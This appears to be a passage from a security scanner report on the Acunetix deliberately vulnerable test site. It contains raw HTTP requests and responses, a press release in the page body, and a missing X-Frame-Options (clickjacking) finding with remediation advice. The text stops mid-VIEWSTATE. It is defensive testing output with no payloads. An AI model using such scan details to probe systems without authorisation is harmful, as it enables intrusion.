style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter X-Frame-OptionsSolution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
Alert tags Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request Request line and header section (342 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:18 GMT Content-Length: 30454Response body (30454 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldG